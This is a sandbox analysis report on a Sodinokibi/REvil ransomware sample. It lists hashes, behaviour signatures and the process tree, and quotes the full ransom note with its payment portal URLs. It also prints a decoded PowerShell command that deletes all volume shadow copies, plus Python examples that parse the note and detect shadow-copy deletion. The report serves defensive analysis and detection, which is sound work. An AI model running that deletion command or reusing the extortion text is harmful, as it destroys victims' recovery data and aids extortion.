Analysis

  • max time kernel
    135s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    22-05-2024 18:52

General

  • Target

    6844bdb8fc61ede9a4ad6122721c8c71_JaffaCakes118.exe

  • Size

    166KB

  • MD5

    6844bdb8fc61ede9a4ad6122721c8c71

  • SHA1

    19f0c1511b39be9951a2e9180721748cb3ccd389

  • SHA256

    926a003f4877c7a6388cf753dd4c392902fb1fe9c1ce17151446e8056b55b0d1

  • SHA512

    6f1a36e723a2d280458beabd77b7377796bfaf8059019b0160af1ecce190adbed8e991e5f8016a5c2ed92d26f6b6132149f1412a5c3216e6b7a8756b2c8c88e6

  • SSDEEP

    3072:1LFrb30BRtBZZg+i2ayy2RjLTuVyu7CJDgoMT3QuDHQdCer:ZJ0BXScFy2RsQJ8zguDHP

Malware Config

Extracted

Path

C:\Users\qt6p17-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===---

[+] Whats Happen? [+]

Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension qt6p17. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

[+] What guarantees? [+]

Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.

[+] How to get access on website? [+]

You have two ways:
1) [Recommended] Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D795CAAFADA2BEB2
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
b) Open our secondary website: http://decryptor.cc/D795CAAFADA2BEB2
Warning: secondary website can be blocked, thats why first variant much better and more available.
When you open our website, put the following data in the input form: Key: K8Sf4solvicGr5EC9+HpJ0YlZhW8PhNrx4eZd1JQQapzcer2aqtytz/z+7epMXR5 G5bIOLudJZCmhILxvQlMeu5TtCxTWzdo41UINyYcRU8b6HQJzvfasr5aAlLlkCR4 O36/fD0plodFaNfaF7gVmrfeZDI2yP/aHuUGGlqZyYCAi9Z0wutjJkeNTxFnJfWP zzC3C0V2bdRccYNghLsXfmUdVSUQOkUG3DjIx/r/AKVSE56iSni/T+xyNjYOrAsv qbVcF8n9w7Jlq18L+wRcUnxAxGFRe9WNJuctvdxPA+uDy0z8JRe1psw0y4hKIdR7 lSBQF6ollY9dgn5uu6S21YNUaHjYOSBTMsju5VgYWz2BxpnYi7eUO2Tmx5Vs0w+R l8gnfuGG5F9QXJmmqCTyVg/AE+bKaDJph9G1lTedsbgBONUSerap+HpMj4wjT7CA 4KerUdmmr8JZvqLoxyMcPrqSnutrp8iC3EsLNn804i7sb9DC6qUpOAKoXf7W9Ny7 0eCwkt04mjmYVxQEvrBv1VB4WRj1O22XLcT+7yh7fHiZcS+gF9O7ott6csXKS2Hq /436DUWSJFH7eZd3ozVW1v5q0GSGV/eSzClPjJm4zdb9AXcYSdG49U1Ukld+mmTh FW86gbXeABI3RQT3hO26JEy7mFtlMnoMLXXjDmJWR1Oqed/KhX7JyE7xg4K2IAyb hrnJIxvpLV+duC4UsP52QpGbGh0NUekmzwQ3noLuSyoP4Yhf5RM7UqwDQXhiU7R3 bSRwvASElJruIxwG/nrokeD2mPmSHFmLM5pS7N9YNXNGfxOfTs/abEKcC+2YWDb+ IDcQ5RIO2EWdyB5moceCZCeEO1zeg/n02GPJjyhv7eJGLThhTsfdLObpl5OaXDW4 CiLSiEyGslNU/47PNFlbriQqhqLxS7LSdfBZJl7rqRkKCrO6DRcVYHN2t1j4UbhJ +X1Wy9RRdOlSLKSxF8zhjyYb+aT01NWd/Cvfl4+q9HCNBAoaBErvjvaYiTy/AYuJ uiziWuiL+ErwiUmwUi6Xpm3P48uYp+IMi1oey7emQ3fJ6HA0Gzpiw6H0pmQ4eI5D BU2MNzL2L0FE4lWaTTuayGDCsIwyXr2rx+GsKswMB03SvrF/41jGBmiEgf583lF/ wp4kocW5aL7I25ViUvl9c1TU5S2hzKkWhbYdjUxbQwczfoPsCHCBfy3oXwD6GaxP FwAWROfXQmvS3oFVNAfSrTwIE0G72s74yNB6oT2V9bOw1/+e+zvA+VhnAp1WhtaD Udx9odX709Z7tlmGsdwqb1Li67xJYURQYm4vGzmgmX9VO6lDCGnaIXFBp/NZvbAy 969Xqey3bGtZ9Tj7NYv01RMj6cHYLGEj/tLehsoc4LSnYtSJAag= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D795CAAFADA2BEB2

http://decryptor.cc/D795CAAFADA2BEB2
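The fields listed under Extracted (note path, extension, portal URLs) can be recovered from the note text itself. The Python below is an added example, not the sandbox's own extractor: it pulls the encrypted-file extension, the note filename that follows from it (`<ext>-readme.txt`, matching the Path above), the portal URLs, the per-victim ID that both portal paths share, and the key blob. Its input is a constructed sample made of the first lines of the note above with the key cut to its first two lines; the function and field names are this example's own.

```python
import re
from urllib.parse import urlparse

# Constructed sample: the opening lines of the qt6p17-readme.txt note shown above, with the
# key blob cut to its first two lines (the real blob is roughly 1.7 KB of base64).
SAMPLE_NOTE = """---=== Welcome. Again. ===---
[+] Whats Happen? [+]
Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension qt6p17.
[+] How to get access on website? [+]
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D795CAAFADA2BEB2
b) Open our secondary website: http://decryptor.cc/D795CAAFADA2BEB2
When you open our website, put the following data in the input form:
Key: K8Sf4solvicGr5EC9+HpJ0YlZhW8PhNrx4eZd1JQQapzcer2aqtytz/z+7epMXR5
G5bIOLudJZCmhILxvQlMeu5TtCxTWzdo41UINyYcRU8b6HQJzvfasr5aAlLlkCR4
-----------------------------------------------------------------------------------------
!!! DANGER !!!
"""

_EXT_RE = re.compile(r"has extension\s+([A-Za-z0-9]+)")
_URL_RE = re.compile(r"https?://\S+")
# The key is line-wrapped base64 that runs from "Key:" to the dashed separator.
_KEY_RE = re.compile(r"Key:\s*(.*?)\n-{10,}", re.S)


def parse_sodinokibi_note(text: str) -> dict:
    """Extract the per-sample indicators from a Sodinokibi/REvil ransom note."""
    ext_m = _EXT_RE.search(text)
    ext = ext_m.group(1) if ext_m else None

    # The victim ID is the path component shared by the TOR and clearnet portals.
    # The Tor download link (https://torproject.org/) has no path and is skipped.
    portals, victim_ids = [], set()
    for url in _URL_RE.findall(text):
        path = urlparse(url).path.strip("/")
        if path:
            portals.append(url)
            victim_ids.add(path)

    key_m = _KEY_RE.search(text)
    key = "".join(key_m.group(1).split()) if key_m else None  # drop line wrapping

    return {
        "extension": ext,
        "note_filename": f"{ext}-readme.txt" if ext else None,
        "portal_urls": portals,
        # Only trust the ID when every portal agrees on it.
        "victim_id": victim_ids.pop() if len(victim_ids) == 1 else None,
        "key": key,
    }


if __name__ == "__main__":
    for field, value in parse_sodinokibi_note(SAMPLE_NOTE).items():
        print(f"{field}: {value}")
```

The victim ID and extension are generated per infection, so they are useful for tying a note to a host but not as family-wide indicators; the .onion hostname is the durable one.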

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application (2 TTPs, 1 IoC)
  • Enumerates connected drives (3 TTPs, 25 IoCs)

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  • Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  • Drops file in Program Files directory (13 IoCs)
  • Modifies system certificate store (2 TTPs, 10 IoCs)
  • Suspicious behavior: EnumeratesProcesses (4 IoCs)
  • Suspicious use of AdjustPrivilegeToken (5 IoCs)
  • Suspicious use of WriteProcessMemory (2 IoCs)
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots. Here the sample's PowerShell child process deletes every Win32_ShadowCopy instance over WMI, removing the local restore points a victim could otherwise recover files from; vssvc.exe starting with SeBackup-style privilege adjustment during the run is consistent with the service carrying out those deletions.

Processes

  • C:\Users\Admin\AppData\Local\Temp\6844bdb8fc61ede9a4ad6122721c8c71_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\6844bdb8fc61ede9a4ad6122721c8c71_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1552
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (decoded -EncodedCommand, base64 over UTF-16LE: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();})
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1840
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
    PID:316
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4792
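The powershell.exe child above (PID 1840) is started with -e, which takes a base64 string of the UTF-16LE script, so the sandbox records only the encoded form. The Python below is an added example, not part of the report or of any sandbox tooling: it decodes such a command line (PowerShell accepts -e, -ec, -enc and longer prefixes of -EncodedCommand) and flags the shadow-copy deletion idioms that the "Uses Volume Shadow Copy service COM API" signature points at, matching both the decoded script and the raw command line so unencoded vssadmin/wmic variants are caught too. The encoded command line is the one recorded above; the function names and the extra command lines in the test are this example's own.

```python
import base64
import re

# Command line as recorded for PID 1840 in the process tree above.
ENCODED_CMDLINE = (
    "powershell -e "
    "RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAA"
    "RgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="
)

# powershell.exe resolves any unambiguous prefix of -EncodedCommand; the common ones are listed.
# Longest alternative first so "-encodedcommand" is not cut short at "-e".
_ENC_FLAG = re.compile(
    r"(?:^|\s)[-/](?:encodedcommand|encoded|enc|ec|e)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)


def decode_encoded_command(cmdline: str):
    """Return the plaintext script behind -EncodedCommand, or None if absent/undecodable."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        # The payload is UTF-16LE, not UTF-8; an odd byte count means it was not -e data.
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Shadow-copy destruction idioms; all three leave the victim without local restore points.
SHADOW_COPY_PATTERNS = [
    re.compile(r"win32_shadowcopy.*?\.delete\(", re.I | re.S),   # WMI, as in this sample
    re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I),  # vssadmin delete shadows
    re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),   # wmic shadowcopy delete
]


def flags_shadow_copy_deletion(cmdline: str) -> bool:
    """True if the command line, encoded or not, deletes volume shadow copies."""
    decoded = decode_encoded_command(cmdline) or ""
    haystack = cmdline + "\n" + decoded
    return any(p.search(haystack) for p in SHADOW_COPY_PATTERNS)


if __name__ == "__main__":
    print("decoded :", decode_encoded_command(ENCODED_CMDLINE))
    print("flagged :", flags_shadow_copy_deletion(ENCODED_CMDLINE))
```

In a detection pipeline the decoded text should be logged alongside the raw command line; Script Block Logging (event 4104) would show the same plaintext, but process-creation telemetry often is the only record on a host where that logging is off.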

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0p3lqsme.2sz.ps1 (written by PowerShell itself at startup to test script-enforcement policy, not a payload dropped by the sample)

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\qt6p17-readme.txt

      Filesize

      6KB

      MD5

      b6958178508b02cdfeb4050c4d6f38bf

      SHA1

      0666ce25653a8df8adf1c04cd65784cdc670379f

      SHA256

      b534f88526cdf627d5501eadcb0b383c34e8688836262f49a049513e4e22a802

      SHA512

      5711a048643325e02bfef4d667e8139c61ce10085b9800262fc5fc6c0787d20bcd3329ac37723173fbee2e52adc7415a824d264cde746ab2eaca6a70b32f4b1d

    • memory/1840-0-0x00007FFCA6DD3000-0x00007FFCA6DD5000-memory.dmp

      Filesize

      8KB

    • memory/1840-1-0x000001AC3A030000-0x000001AC3A052000-memory.dmp

      Filesize

      136KB

    • memory/1840-11-0x00007FFCA6DD0000-0x00007FFCA7891000-memory.dmp

      Filesize

      10.8MB

    • memory/1840-12-0x00007FFCA6DD0000-0x00007FFCA7891000-memory.dmp

      Filesize

      10.8MB

    • memory/1840-15-0x00007FFCA6DD0000-0x00007FFCA7891000-memory.dmp

      Filesize

      10.8MB